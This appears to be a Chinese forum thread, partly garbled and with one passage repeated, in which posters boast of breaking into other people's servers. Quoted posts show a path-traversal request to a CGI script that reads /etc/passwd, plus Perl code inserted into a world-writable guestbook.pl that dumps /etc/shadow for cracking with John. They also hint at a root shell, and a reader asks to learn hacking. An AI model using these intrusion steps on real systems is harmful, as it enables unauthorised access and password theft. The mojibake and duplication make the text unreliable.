胰タ戳艘豢矗⑾种饕衬谌菥雇耆淞搜0?...
不过好在,工夫不负有心人终于找到它的新地址:
http://161.53.42.3/~crv/
security/
?在 Hotaru (Tomoe Hotaru) 的大作中提到: 】
: 近日到一个
日本漫画
个人主页转转,发现有一个
cgi是这样的:
: http://www
.somewhere.co.jp/~someone/view_cg.cgi
: 是用来看cg的cgi。(个人主页可以放自己的cgi
?????),用法是
: view_cg.cgi?html=xxxx.html&cg=xxxx.
jpg (大概是这样吧)
: 嘿嘿,漏洞很明显吧!试一试
: view_cg.cgi?html=/etc/passwd
: 看到了!不过shadow了的...-_-!
: 不过这个管理员没有用root来跑httpd,不然的话...
: 再试:
: view_cg.cgi?html=view_cg.cgi
: 拿到
源代码,再仔细
看看吧,哈!
用什么方法进入的?我很想学一学做黑客!
做黑客要有什么知识范围,和需要什么软件呢?
我的
E-MAIL是:fstony@163.
net
请给予我
E-MAIL
事先声明,我并无意破坏的,我当然也不会透露是哪台机,
: 不过其安全性之差实在无话可说... :)
: 手段是
利用cgi。具体过程是这样的:
: 先用我的普通用户帐号telnet进去,找到cgi-
bin目录。可用
: 命令: find / -name cgi-bin
: 之后当然进入该目录看看又有什么收获啦!
: $ ls -l
: ....
: ....(省略)
: -rwxrwxrwx root other ...
guestbook.
pl
: ....
: ....
: 哇,怎么样,有头绪了吧?没错!这个文件是可任意修改的!
: (那个笨root,怎么搞的?)
: (记住修改之前先把它
备份!!!!)
: 好,发挥你的想象力吧。我先试着删除了大部分代码,再加入
@
data = `cat /etc/shadow`;
: print @
data;
: 存盘,在浏览器中打入:
: http://www.xyz.ab
c/cgi-bin/guestbook.pl
: 之后,shadow档一览无余!
: 赶快存盘,再恢复原先的guestbook.pl,闪人了!到john上场了!
: 其实,还可以利用它,可以轻而易举获得root shell。这里不多
: 之后当然进入该目录看看又有什么收获啦!
: $ ls -l
: ....
: ....(省略)
: -rwxrwxrwx root other ... guestbook.pl
: ....
: ....
: 哇,怎么样,有头绪了吧?没错!这鑫募?强扇? 薷牡模?
: (那个笨root,怎么搞的?)
: (记住修改之前先把它备份!!!!)
: 好,发挥你的想象力吧。我先试着删除了大部分代码,再加入
: @data = `cat /etc/shadow`;
: print @data;
: 存盘,在浏览器中打入:
: http://www.xyz.
abc/cgi-bin/guestbook.pl
: 之后,shadow档一览无余!
: 赶快存盘,再恢复原先的guestbook.pl,闪人了!到john上场了!
: 其实,还可以利用它,可以轻而易举获得root shell。这里不多
: 说了,自己想想吧!
